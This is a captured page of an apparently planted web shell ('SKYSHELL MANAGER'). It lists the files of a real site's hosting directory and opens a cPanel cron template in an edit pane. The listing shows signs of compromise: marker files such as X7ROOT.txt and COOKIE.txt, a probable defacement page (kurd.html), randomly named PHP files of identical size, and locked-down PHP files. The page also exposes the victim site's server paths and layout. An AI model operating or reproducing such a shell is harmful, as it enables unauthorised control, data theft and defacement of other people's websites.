📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: edit_module.html.tt
[%- SET schedule = [ { name = 'minute', text = locale.maketext('Minute') }, { name = 'hour', text = locale.maketext('Hour') }, { name = 'day', text = locale.maketext('Day') }, { name = 'month', text = locale.maketext('Month') }, { name = 'weekday', text = locale.maketext('Weekday') } ]; SET common_settings = [{ 'value' => '* * * * *', 'name' => locale.maketext('Every Minute') }, { 'value' => '*/5 * * * *', 'name' => locale.maketext('Every 5 Minutes') }, { 'value' => '0,30 * * * *', 'name' => locale.maketext('Twice an Hour') }, { 'value' => '0 * * * *', 'name' => locale.maketext('Once an Hour') }, { 'value' => '0 0,12 * * *', 'name' => locale.maketext('Twice a Day') }, { 'value' => '0 0 * * *', 'name' => locale.maketext('Once a Day') }, { 'value' => '0 0 * * 0', 'name' => locale.maketext('Once a Week') }, { 'value' => '0 0 1,15 * *', 'name' => locale.maketext('1st and 15th') }, { 'value' => '0 0 1 * *', 'name' => locale.maketext('Once a Month') }, { 'value' => '0 0 1 1 *', 'name' => locale.maketext('Once a Year') }]; -%] <div class="dt_module" id="edit_module_[% q.count %]" style="display: none"> <div class="form-group"> [% FOREACH field IN schedule -%] <label>[% field.text %]</label> <div class="row"> <div class="col-xs-2"> <input id="[% field.name %]_[% q.count %]" type="text" class="form-control" size="4" /> </div> <div id="[% field.name %]_[% q.count %]_error" class="col-xs-12 col-sm-6 col-md-6 col-lg-6"></div> </div> [% END %] </div> <div class="row"> <div class="form-group col-xs-12 col-sm-6 col-md-4"> <select id="common_options_[% q.count %]" onchange="select_common_option('[% q.count %]')" class="form-control"> <option value="--">-- [% locale.maketext("Common Settings") %] --</option> [% FOREACH setting IN common_settings %] <option value="[% setting.value %]"> [% setting.name %] ([% setting.value %]) </option> [% END %] </select> </div> </div> <div class="row"> <div class="form-group col-xs-12 col-md-8"> <label>[% locale.maketext("Command") %]</label> <input id="command_[% q.count %]" type="text" class="form-control" size="45" /> <div id="command_[% q.count %]_error"></div> </div> </div> <div class="form-group" id="edit_input_[% q.count %]"> <input id="edit_line_[% q.count %]" type="button" class="btn btn-primary" value="[% locale.maketext("Edit Line") %]" /> <button class="btn btn-link" onclick="toggle_module('edit_module_[% q.count %]')"> [% locale.maketext("Cancel") %] </button> </div> <div id="edit_status_[% q.count %]"></div> </div>
Save